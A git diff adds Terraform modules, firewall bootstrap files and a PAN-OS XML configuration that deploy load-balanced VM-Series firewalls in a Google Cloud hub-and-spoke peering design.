+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                  <rule-type>universal</rule-type>
+                </entry>
+                <entry name="outbound">
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>allow</action>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+                <entry name="interzone-default">
+                  <action>deny</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <nat>
+              <rules>
+                <entry name="health-check">
+                  <to>
+                    <member>trust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>gcp-health-probes</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                  <to-interface>ethernet1/1</to-interface>
+                  <dynamic-destination-translation>
+                    <translated-address>loopback-interface</translated-address>
+                  </dynamic-destination-translation>
+                  <description>No NAT on GCP LB health check.</description>
+                </entry>
+                <entry name="outbound">
+                  <source-translation>
+                    <dynamic-ip-and-port>
+                      <interface-address>
+                        <interface>ethernet1/2</interface>
+                      </interface-address>
+                    </dynamic-ip-and-port>
+                  </source-translation>
+                  <to>
+                    <member>untrust</member>
+                  </to>
+                  <from>
+                    <member>trust</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <service>any</service>
+                </entry>
+              </rules>
+            </nat>
+          </rulebase>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>ethernet1/2</member>
+                <member>loopback.1</member>
+              </interface>
+            </network>
+          </import>
+          <address>
+            <entry name="gcp-health-probe-1">
+              <ip-netmask>35.191.0.0/16</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="gcp-health-probe-2">
+              <ip-netmask>130.211.0.0/22</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+            <entry name="loopback-interface">
+              <ip-netmask>100.64.0.1</ip-netmask>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+              <description>Loopback interface for GLB healthcheck</description>
+            </entry>
+          </address>
+          <address-group>
+            <entry name="gcp-health-probes">
+              <static>
+                <member>gcp-health-probe-1</member>
+                <member>gcp-health-probe-2</member>
+              </static>
+              <tag>
+                <member>gcp-resource</member>
+              </tag>
+            </entry>
+          </address-group>
+          <tag>
+            <entry name="untrust">
+              <color>color6</color>
+            </entry>
+            <entry name="trust">
+              <color>color13</color>
+            </entry>
+            <entry name="gcp-resource">
+              <color>color24</color>
+            </entry>
+          </tag>
+        </entry>
+      </vsys>
+    </entry>
+  </devices>
+</config>
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt
new file mode 100755
index 00000000..8d3c0290
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt
@@ -0,0 +1,10 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+dhcp-accept-server-hostname=yes
+dns-primary=8.8.8.8
+dns-secondary=4.2.2.2
+op-command-modes=mgmt-interface-swap
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/diagram.png b/gcp/adv_peering_4fw_2spoke/diagram.png
new file mode 100644
index 00000000..f45262b1
Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/diagram.png differ
diff --git a/gcp/adv_peering_4fw_2spoke/fw_inbound.tf b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf
new file mode 100644
index 00000000..717d691e
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf
@@ -0,0 +1,76 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for inbound firewalls
+module "bootstrap_inbound" {
+  source        = "./modules/gcp_bootstrap/"
+  bucket_name   = "fw-bootstrap-inbound"
+  file_location = "bootstrap_files/fw_inbound/"
+  config        = ["init-cfg.txt", "bootstrap.xml"]
+  license       = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create inbound firewalls
+module "fw_inbound" {
+  source = "./modules/vmseries/"
+  names  = var.fw_names_inbound
+  zones  = [
+    data.google_compute_zones.available.names[0],
+    data.google_compute_zones.available.names[1]
+  ]
+  subnetworks = [
+    module.vpc_untrust.subnetwork_self_link[0],
+    module.vpc_mgmt.subnetwork_self_link[0],
+    module.vpc_trust.subnetwork_self_link[0]
+  ]
+  machine_type          = var.fw_machine_type
+  bootstrap_bucket      = module.bootstrap_inbound.bucket_name
+  mgmt_interface_swap   = "enable"
+  ssh_key               = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+  image                 = "${var.fw_image}-${var.fw_panos}"
+  nic0_public_ip        = true
+  nic1_public_ip        = true
+  nic2_public_ip        = false
+  create_instance_group = true
+
+  dependencies = [
+    module.bootstrap_inbound.completion,
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create public load balancer
+module "glb" {
+  source = "./modules/glb/"
+  name   = var.glb_name
+  backends = {
+    "0" = [
+      {
+        group                        = module.fw_inbound.instance_group[0]
+        balancing_mode               = null
+        capacity_scaler              = null
+        description                  = null
+        max_connections              = null
+        max_connections_per_instance = null
+        max_rate                     = null
+        max_rate_per_instance        = null
+        max_utilization              = null
+      },
+      {
+        group                        = module.fw_inbound.instance_group[1]
+        balancing_mode               = null
+        capacity_scaler              = null
+        description                  = null
+        max_connections              = null
+        max_connections_per_instance = null
+        max_rate                     = null
+        max_rate_per_instance        = null
+        max_utilization              = null
+      }
+    ]
+  }
+  backend_params = [
+    // health check path, port name, port number, timeout seconds.
+    "/,http,80,10"
+  ]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/fw_outbound.tf b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf
new file mode 100644
index 00000000..b97e8281
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf
@@ -0,0 +1,95 @@
+#-----------------------------------------------------------------------------------------------
+# Create bootstrap bucket for outbound firewalls
+module "bootstrap_outbound" {
+  source        = "./modules/gcp_bootstrap/"
+  bucket_name   = "fw-bootstrap-egress"
+  file_location = "bootstrap_files/fw_outbound/"
+  config        = ["init-cfg.txt", "bootstrap.xml"]
+  license       = ["authcodes"]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create outbound firewalls 
+module "fw_outbound" {
+  source = "./modules/vmseries/"
+  names  = var.fw_names_outbound
+  zones  = [
+    data.google_compute_zones.available.names[0],
+    data.google_compute_zones.available.names[1]
+  ]
+  subnetworks = [
+    module.vpc_trust.subnetwork_self_link[0],
+    module.vpc_mgmt.subnetwork_self_link[0],
+    module.vpc_untrust.subnetwork_self_link[0]
+  ]
+  machine_type          = var.fw_machine_type
+  bootstrap_bucket      = module.bootstrap_outbound.bucket_name
+  mgmt_interface_swap   = "enable"
+  ssh_key               = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : ""
+  image                 = "${var.fw_image}-${var.fw_panos}"
+  nic0_public_ip        = false
+  nic1_public_ip        = true
+  nic2_public_ip        = true
+  create_instance_group = true
+
+  dependencies = [
+    module.bootstrap_outbound.completion,
+  ]
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create 2 internal load balancers. LB-1 is A/A for internet.  LB-2 is A/P for e-w.
+module "ilb" {
+  source            = "./modules/ilb/"
+  name              = var.ilb_name
+  subnetworks       = [module.vpc_trust.subnetwork_self_link[0]]
+  all_ports         = true
+  ports             = []
+  health_check_port = "22"
+
+  backends = {
+    "0" = [
+      {
+        group    = module.fw_outbound.instance_group[0]
+        failover = false
+      },
+      {
+        group    = module.fw_outbound.instance_group[1]
+        failover = false
+      }
+    ],
+    "1" = [
+      {
+        group    = module.fw_outbound.instance_group[0]
+        failover = false
+      },
+      {
+        group    = module.fw_outbound.instance_group[1]
+        failover = true
+      }
+    ]
+  }
+  providers = {
+    google = google-beta
+  }
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create default route to internal LB. Route will be exported to spokes via GCP peering.
+resource "google_compute_route" "default" {
+  name         = "${var.ilb_name}-default"
+  provider     = google-beta
+  dest_range   = "0.0.0.0/0"
+  network      = module.vpc_trust.vpc_self_link
+  next_hop_ilb = module.ilb.forwarding_rule[0]
+  priority     = 99
+}
+
+resource "google_compute_route" "eastwest" {
+  name         = "${var.ilb_name}-eastwest"
+  provider     = google-beta
+  dest_range   = "10.10.0.0/16"
+  network      = module.vpc_trust.vpc_self_link
+  next_hop_ilb = module.ilb.forwarding_rule[1]
+  priority     = 99
+}
diff --git a/gcp/adv_peering_4fw_2spoke/fw_vpc.tf b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf
new file mode 100644
index 00000000..a1f096eb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf
@@ -0,0 +1,35 @@
+#-----------------------------------------------------------------------------------------------
+# Create firewall VPCs & subnets
+module "vpc_mgmt" {
+  source = "./modules/vpc/"
+
+  vpc                  = var.mgmt_vpc
+  subnets              = var.mgmt_subnet
+  cidrs                = var.mgmt_cidr
+  regions              = [var.region]
+  allowed_sources      = var.mgmt_sources
+  allowed_protocol     = "TCP"
+  allowed_ports        = ["443", "22"]
+}
+
+module "vpc_untrust" {
+  source = "./modules/vpc/"
+
+  vpc                  = var.untrust_vpc
+  subnets              = var.untrust_subnet
+  cidrs                = var.untrust_cidr
+  regions              = [var.region]
+  allowed_sources      = ["0.0.0.0/0"]
+}
+
+module "vpc_trust" {
+  source = "./modules/vpc/"
+
+  vpc                  = var.trust_vpc
+  subnets              = var.trust_subnet
+  cidrs                = var.trust_cidr
+  regions              = [var.region]
+  allowed_sources      = ["0.0.0.0/0"]
+  delete_default_route = true
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/guide.pdf b/gcp/adv_peering_4fw_2spoke/guide.pdf
new file mode 100644
index 00000000..8b4b69e6
Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/guide.pdf differ
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf
new file mode 100644
index 00000000..a93e7956
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf
@@ -0,0 +1,85 @@
+locals {
+  bucket_name = join("", [var.bucket_name, random_string.randomstring.result])
+}
+resource "random_string" "randomstring" {
+  length      = 25
+  min_lower   = 15
+  min_numeric = 10
+  special     = false
+}
+
+resource "google_storage_bucket" "bootstrap" {
+  name          = local.bucket_name
+  force_destroy = true
+}
+
+resource "google_storage_bucket_object" "config_full" {
+  count  = length(var.config) > 0 ? length(var.config) : "0"
+  name   = "config/${element(var.config, count.index)}"
+  source = "${var.file_location}${element(var.config, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_full" {
+  count  = length(var.content) > 0 ? length(var.content) : "0"
+  name   = "content/${element(var.content, count.index)}"
+  source = "${var.file_location}${element(var.content, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_full" {
+  count  = length(var.license) > 0 ? length(var.license) : "0"
+  name   = "license/${element(var.license, count.index)}"
+  source = "${var.file_location}${element(var.license, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_full" {
+  count  = length(var.software) > 0 ? length(var.software) : "0"
+  name   = "software/${element(var.software, count.index)}"
+  source = "${var.file_location}${element(var.software, count.index)}"
+  bucket = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "config_empty" {
+  count   = length(var.config) == 0 ? 1 : 0
+  name    = "config/"
+  content = "config/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "content_empty" {
+  count   = length(var.content) == 0 ? 1 : 0
+  name    = "content/"
+  content = "content/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "license_empty" {
+  count   = length(var.license) == 0 ? 1 : 0
+  name    = "license/"
+  content = "license/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "google_storage_bucket_object" "software_empty" {
+  count   = length(var.software) == 0 ? 1 : 0
+  name    = "software/"
+  content = "software/"
+  bucket  = google_storage_bucket.bootstrap.name
+}
+
+resource "null_resource" "dependency_setter" {
+  depends_on = [
+    google_storage_bucket.bootstrap,
+    google_storage_bucket_object.config_full,
+    google_storage_bucket_object.content_full,
+    google_storage_bucket_object.license_full,
+    google_storage_bucket_object.software_full,
+    google_storage_bucket_object.config_empty,
+    google_storage_bucket_object.content_empty,
+    google_storage_bucket_object.license_empty,
+    google_storage_bucket_object.software_empty,
+  ]
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf
new file mode 100644
index 00000000..3697edba
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf
@@ -0,0 +1,8 @@
+output "completion" {
+  value = null_resource.dependency_setter.id
+}
+
+output "bucket_name" {
+  value = google_storage_bucket.bootstrap.name
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf
new file mode 100644
index 00000000..ebe6f1de
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf
@@ -0,0 +1,24 @@
+variable "bucket_name" {
+}
+
+variable "file_location" {
+}
+
+variable "config" {
+  type    = list(string)
+  default = []
+}
+
+variable "content" {
+  type    = list(string)
+  default = []
+}
+
+variable "license" {
+  type    = list(string)
+  default = []
+}
+
+variable "software" {
+  default = []
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf
new file mode 100644
index 00000000..bbfa03d6
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf
@@ -0,0 +1,89 @@
+resource "google_compute_global_forwarding_rule" "http" {
+  count      = var.http_forward ? 1 : 0
+  name       = "${var.name}-http"
+  target     = google_compute_target_http_proxy.default[0].self_link
+  ip_address = google_compute_global_address.default.address
+  port_range = "80"
+}
+
+resource "google_compute_global_forwarding_rule" "https" {
+  count      = var.ssl ? 1 : 0
+  name       = "${var.name}-https"
+  target     = google_compute_target_https_proxy.default[0].self_link
+  ip_address = google_compute_global_address.default.address
+  port_range = "443"
+}
+
+resource "google_compute_global_address" "default" {
+  name       = "${var.name}-address"
+  ip_version = var.ip_version
+}
+
+# HTTP proxy when ssl is false
+resource "google_compute_target_http_proxy" "default" {
+  count = var.http_forward ? 1 : 0
+  name  = "${var.name}-http-proxy"
+  url_map = compact(
+    concat([
+    var.url_map], google_compute_url_map.default.*.self_link),
+  )[0]
+}
+# HTTPS proxy  when ssl is true
+resource "google_compute_target_https_proxy" "default" {
+  count = var.ssl ? 1 : 0
+  name  = "${var.name}-https-proxy"
+  url_map = compact(
+    concat([
+  var.url_map], google_compute_url_map.default.*.self_link), )[0]
+  ssl_certificates = compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link, ), )
+}
+
+resource "google_compute_ssl_certificate" "default" {
+  count       = var.ssl && ! var.use_ssl_certificates ? 1 : 0
+  name_prefix = "${var.name}-certificate"
+  private_key = var.private_key
+  certificate = var.certificate
+
+  lifecycle {
+    create_before_destroy = true
+  }
+}
+
+resource "google_compute_url_map" "default" {
+  count           = var.create_url_map ? 1 : 0
+  name            = "${var.name}"
+  default_service = google_compute_backend_service.default[0].self_link
+}
+
+resource "google_compute_backend_service" "default" {
+  count       = length(var.backend_params)
+  name        = "${var.name}-${count.index}"
+  port_name   = split(",", var.backend_params[count.index])[1]
+  protocol    = var.backend_protocol
+  timeout_sec = split(",", var.backend_params[count.index])[3]
+  dynamic "backend" {
+    for_each = var.backends[count.index]
+    content {
+      balancing_mode               = lookup(backend.value, "balancing_mode")
+      capacity_scaler              = lookup(backend.value, "capacity_scaler")
+      description                  = lookup(backend.value, "description")
+      group                        = lookup(backend.value, "group")
+      max_connections              = lookup(backend.value, "max_connections")
+      max_connections_per_instance = lookup(backend.value, "max_connections_per_instance")
+      max_rate                     = lookup(backend.value, "max_rate")
+      max_rate_per_instance        = lookup(backend.value, "max_rate_per_instance")
+      max_utilization              = lookup(backend.value, "max_utilization")
+    }
+  }
+  health_checks = [
+  google_compute_http_health_check.default[count.index].self_link]
+  security_policy = var.security_policy
+  enable_cdn      = var.cdn
+}
+
+resource "google_compute_http_health_check" "default" {
+  count        = length(var.backend_params)
+  name         = "${var.name}-check-${count.index}"
+  request_path = split(",", var.backend_params[count.index])[0]
+  port         = split(",", var.backend_params[count.index])[2]
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf
new file mode 100644
index 00000000..3c1a64f7
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf
@@ -0,0 +1,4 @@
+output "address" {
+  value = google_compute_global_address.default.address
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf
new file mode 100644
index 00000000..742bedfb
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf
@@ -0,0 +1,95 @@
+variable "ip_version" {
+  description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4"
+  type        = string
+  default     = ""
+}
+
+variable "name" {
+  description = "Name for the forwarding rule and prefix for supporting resources"
+  type        = string
+}
+
+variable "backends" {
+  description = "Map backend indices to list of backend maps."
+  type        = map(list(object({
+    group                        = string
+    balancing_mode               = string
+    capacity_scaler              = number
+    description                  = string
+    max_connections              = number
+    max_connections_per_instance = number
+    max_rate                     = number
+    max_rate_per_instance        = number
+    max_utilization              = number
+  })))
+}
+
+variable "backend_params" {
+  description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds"
+  type        = list(string)
+}
+
+variable "backend_protocol" {
+  description = "The protocol with which to talk to the backend service"
+  default     = "HTTP"
+}
+
+variable "create_url_map" {
+  description = "Set to `false` if url_map variable is provided."
+  type        = bool
+  default     = true
+}
+
+variable "url_map" {
+  description = "The url_map resource to use. Default is to send all traffic to first backend."
+  type        = string
+  default     = ""
+}
+
+variable "http_forward" {
+  description = "Set to `false` to disable HTTP port 80 forward"
+  type        = bool
+  default     = true
+}
+
+variable "ssl" {
+  description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs"
+  type        = bool
+  default     = false
+}
+
+variable "private_key" {
+  description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty."
+  type        = string
+  default     = ""
+}
+
+variable "certificate" {
+  description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty."
+  type        = string
+  default     = ""
+}
+
+variable "use_ssl_certificates" {
+  description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`"
+  type        = bool
+  default     = false
+}
+
+variable "ssl_certificates" {
+  description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided."
+  type        = list(string)
+  default     = []
+}
+
+variable "security_policy" {
+  description = "The resource URL for the security policy to associate with the backend service"
+  type        = string
+  default     = ""
+}
+
+variable "cdn" {
+  description = "Set to `true` to enable cdn on backend."
+  type        = bool
+  default     = false
+}
\ No newline at end of file
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf
new file mode 100755
index 00000000..fee6e098
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf
@@ -0,0 +1,33 @@
+resource "google_compute_health_check" "default" {
+  name = "${var.name}-check-0"
+
+  tcp_health_check {
+    port = var.health_check_port
+  }
+}
+resource "google_compute_region_backend_service" "default" {
+  count         = length(var.backends)
+  name          = "${var.name}-${count.index}"
+  health_checks = [google_compute_health_check.default.self_link]
+
+  dynamic "backend" {
+    for_each = var.backends[count.index]
+    content {
+      group    = lookup(backend.value, "group")
+      failover = lookup(backend.value, "failover")
+    }
+  }
+  session_affinity = "NONE"
+}
+
+resource "google_compute_forwarding_rule" "default" {
+  count                 = length(var.backends)
+  name                  = "${var.name}-all-${count.index}"
+  load_balancing_scheme = "INTERNAL"
+  ip_address            = var.ip_address
+  ip_protocol           = var.ip_protocol
+  all_ports             = var.all_ports
+  ports                 = var.ports
+  subnetwork            = var.subnetworks[0]
+  backend_service       = google_compute_region_backend_service.default[count.index].self_link
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf
new file mode 100644
index 00000000..2e1b10ef
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf
@@ -0,0 +1,4 @@
+output "forwarding_rule" {
+  value = google_compute_forwarding_rule.default.*.self_link
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf
new file mode 100644
index 00000000..f6bbeb80
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf
@@ -0,0 +1,33 @@
+variable "name" {
+}
+
+variable "health_check_port" {
+  default = "22"
+}
+
+variable "backends" {
+  description = "Map backend indices to list of backend maps."
+  type = map(list(object({
+    group    = string
+    failover = bool
+  })))
+}
+
+variable "subnetworks" {
+  type = list(string)
+}
+
+variable "ip_address" {
+  default = null
+}
+
+variable "ip_protocol" {
+  default = "TCP"
+}
+variable "all_ports" {
+  type = bool
+}
+variable "ports" {
+  type    = list(string)
+  default = []
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf
new file mode 100644
index 00000000..2f42125b
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf
@@ -0,0 +1,45 @@
+resource "google_compute_instance" "default" {
+  count                     = length(var.names)
+  name                      = element(var.names, count.index)
+  machine_type              = var.machine_type
+  zone                      = element(var.zones, count.index)
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  metadata_startup_script   = var.startup_script
+
+  metadata = {
+    serial-port-enable = true
+    ssh-keys           = var.ssh_key
+  }
+
+  network_interface {
+    subnetwork = element(var.subnetworks, count.index)
+  }
+
+  boot_disk {
+    initialize_params {
+      image = var.image
+    }
+  }
+
+  service_account {
+    scopes = var.scopes
+  }
+}
+
+
+resource "google_compute_instance_group" "default" {
+  count     = var.create_instance_group ? length(var.names) : 0
+  name      = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+  zone      = element(var.zones, count.index)
+  instances = [google_compute_instance.default[count.index].self_link]
+
+  named_port {
+    name = "http"
+    port = "80"
+  }
+
+  lifecycle {
+    create_before_destroy = true
+  }
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf
new file mode 100644
index 00000000..a5c49887
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf
@@ -0,0 +1,11 @@
+output "vm_names" {
+  value = google_compute_instance.default.*.name
+}
+
+output "vm_self_link" {
+  value = google_compute_instance.default.*.self_link
+}
+
+output "instance_group" {
+  value = google_compute_instance_group.default.*.self_link
+}
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf
new file mode 100644
index 00000000..102808ff
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf
@@ -0,0 +1,43 @@
+variable "names" {
+  type = list(string)
+}
+
+variable "machine_type" {
+}
+variable "create_instance_group" {
+  type    = bool
+  default = false
+}
+
+variable "instance_group_names" {
+  type    = list(string)
+  default = ["vmseries-instance-group"]
+}
+variable "zones" {
+  type = list(string)
+}
+variable "ssh_key" {
+  default = ""
+}
+variable "image" {
+}
+
+variable "subnetworks" {
+  type = list(string)
+}
+
+variable "scopes" {
+  type = list(string)
+
+  default = [
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable "startup_script" {
+  default = ""
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf
new file mode 100644
index 00000000..c74ee4fa
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf
@@ -0,0 +1,83 @@
+resource "null_resource" "dependency_getter" {
+  provisioner "local-exec" {
+    command = "echo ${length(var.dependencies)}"
+  }
+}
+
+resource "google_compute_instance" "vmseries" {
+  count                     = length(var.names)
+  name                      = element(var.names, count.index)
+  machine_type              = var.machine_type
+  zone                      = element(var.zones, count.index)
+  min_cpu_platform          = var.cpu_platform
+  can_ip_forward            = true
+  allow_stopping_for_update = true
+  tags                      = var.tags
+
+  metadata = {
+    mgmt-interface-swap                  = var.mgmt_interface_swap
+    vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket
+    serial-port-enable                   = true
+    ssh-keys                             = var.ssh_key
+  }
+
+  service_account {
+    scopes = var.scopes
+  }
+
+  network_interface {
+
+    dynamic "access_config" {
+      for_each = var.nic0_public_ip ? [""] : []
+      content {}
+    }
+    network_ip = element(var.nic0_ip, count.index)
+    subnetwork = var.subnetworks[0]
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.nic1_public_ip ? [""] : []
+      content {}
+    }
+    network_ip = element(var.nic1_ip, count.index)
+    subnetwork = var.subnetworks[1]
+  }
+
+  network_interface {
+    dynamic "access_config" {
+      for_each = var.nic2_public_ip ? [""] : []
+      content {}
+    }
+    network_ip = element(var.nic2_ip, count.index)
+    subnetwork = var.subnetworks[2]
+  }
+
+  boot_disk {
+    initialize_params {
+      image = var.image
+      type  = var.disk_type
+    }
+  }
+
+  depends_on = [
+    null_resource.dependency_getter
+  ]
+}
+
+resource "google_compute_instance_group" "vmseries" {
+  count     = var.create_instance_group ? length(var.names) : 0
+  name      = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig"
+  zone      = element(var.zones, count.index)
+  instances = [google_compute_instance.vmseries[count.index].self_link]
+
+  named_port {
+    name = "http"
+    port = "80"
+  }
+
+  lifecycle {
+    create_before_destroy = true
+  }
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf
new file mode 100644
index 00000000..01e5f41b
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf
@@ -0,0 +1,24 @@
+output "vm_names" {
+  value = google_compute_instance.vmseries.*.name
+}
+
+output "vm_self_link" {
+  value = google_compute_instance.vmseries.*.self_link
+}
+
+output "instance_group" {
+  value = google_compute_instance_group.vmseries.*.self_link
+}
+
+output "nic0_public_ip" {
+  value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : []
+}
+
+output "nic1_public_ip" {
+  value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : []
+}
+
+output "nic2_public_ip" {
+  value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : []
+}
+
diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf
new file mode 100644
index 00000000..a10b4dbe
--- /dev/null
+++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf
@@ -0,0 +1,102 @@
+variable "subnetworks" {
+  type = list(string)
+}
+
+variable "names" {
+  type = list(string)
+}
+
+variable "machine_type" {
+}
+
+variable "zones" {
+  type = list(string)
+}
+
+variable "cpu_platform" {
+  default = "Intel Broadwell"
+}
+variable "disk_type" {
+  default = "pd-ssd"
+  #default = "pd-standard"
+}
+variable "bootstrap_bucket" {
+  default = ""
+}
+
+variable "ssh_key" {
+  default = ""
+}
+
+variable "public_lb_create" {
+  default = false
+}
+
+variable "scopes" {
+  type = list(string)
+
+  default = [
+    "https://www.googleapis.com/auth/compute.readonly",
+    "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+    "https://www.googleapis.com/auth/devstorage.read_only",
+    "https://www.googleapis.com/auth/logging.write",
+    "https://www.googleapis.com/auth/monitoring.write",
+  ]
+}
+
+variable "image" {
+}
+
+variable "tags" {
+  type    = list(string)
+  default = []
+}
